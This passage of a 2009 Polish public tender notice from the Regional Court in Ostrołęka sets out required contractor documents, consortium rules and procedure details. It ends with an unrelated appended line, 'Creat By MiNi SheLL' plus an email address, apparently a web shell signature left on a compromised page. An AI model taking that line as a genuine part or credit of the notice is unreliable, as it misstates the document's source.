- uprawnień budowlanych do kierowania robotami budowlanymi bez ograniczeń w specjalności:
-	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
-	instalacyjnej w zakresie sieci, instalacji i urządzeń teletechnicznych;
-	instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych.
- obsługi i eksploatacji urządzeń i instalacji do 1kV - min. 2 osoby
- aktualnych zaświadczeń potwierdzających przynależność do Polskiej Izby Inżynierów Budownictwa;
(załącznik nr 4 do SIWZ) lub pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia;
i) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania oferty;
j) aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłatami oraz składkami na ubezpieczenia zdrowotne lub społeczne lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania oferty;
k) aktualną polisę lub inny dokument potwierdzający, iż Wykonawca ubezpieczony jest od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej w wymaganej wysokości min. 200 000 zł.
l) dowód wniesienia wadium.
2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. wspólnicy spółki cywilnej, uczestnicy konsorcjum).
3. W przypadku składania jednej oferty przez Wykonawców wspólnie ubiegających się o  udzielenie zamówienia (np. wspólników spółki cywilnej, uczestników konsorcjum) muszą zostać spełnione następujące wymagania:
a)	wymagane w niniejszym rozdziale pkt.1 lit. c), d), i), j), k), dokumenty i  oświadczenia muszą zostać złożone oddzielnie przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
b)	wymagane  w niniejszym rozdziale pkt.1 lit. a) , b) e), g), h) dokumenty muszą zostać złożone łącznie przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
4. W przypadku Wykonawców wspólnie ubiegających się o  udzielenie zamówienia do oferty musi być dołączone pełnomocnictwo do reprezentowania ich w postępowaniu o  udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w  sprawie zamówienia publicznego. Przed zawarciem umowy w sprawie zmówienia publicznego, zamawiający zażąda przedstawienia umowy regulującej współpracę podmiotów występujących wspólnie (tj. określającą sposób współdziałania Wykonawców wspólnie ubiegających się o udzielenie zamówienia (umowa spółki cywilnej, umowa konsorcjum)).
5. W razie przedstawienia zamawiającemu przed podpisaniem umowy w sprawie zamówienia publicznego, umowy określającej sposób współdziałania Wykonawców wspólnie ubiegających się      o udzielenie zamówienia (umowy spółki cywilnej, umowy konsorcjum) muszą zostać spełnione następujące wymagania:
a)	okres obowiązywania umowy między Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia musi być określony w tej umowie i obejmować okres wykonania zamówienia. Wyklucza się możliwość złożenia przedwstępnej umowy konsorcjum albo przedwstępnej umowy spółki cywilnej,
b)	z umowy określającej sposób współdziałania Wykonawców wspólnie ubiegających się o  udzielenie zamówienia musi wynikać prawo do podpisania oferty, zaciągania zobowiązań, dokonywania rozliczeń, zakres prac przewidzianych do wykonania przez każdego z nich. Umowa musi być podpisana przez wszystkich umocowanych uczestników konsorcjum, 
c)	wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy (art. 141 ustawy Prawo zamówień publicznych)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ostroleka.so.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Ostrołęce, ul. Gomulickiego 5, 07-410 Ostrołęka, pok. C36.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 10:00, miejsce: Sąd Okręgowy w Ostrołęce, ul. Gomulickiego 5, 07-410 Ostrołęka, pok. C36.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com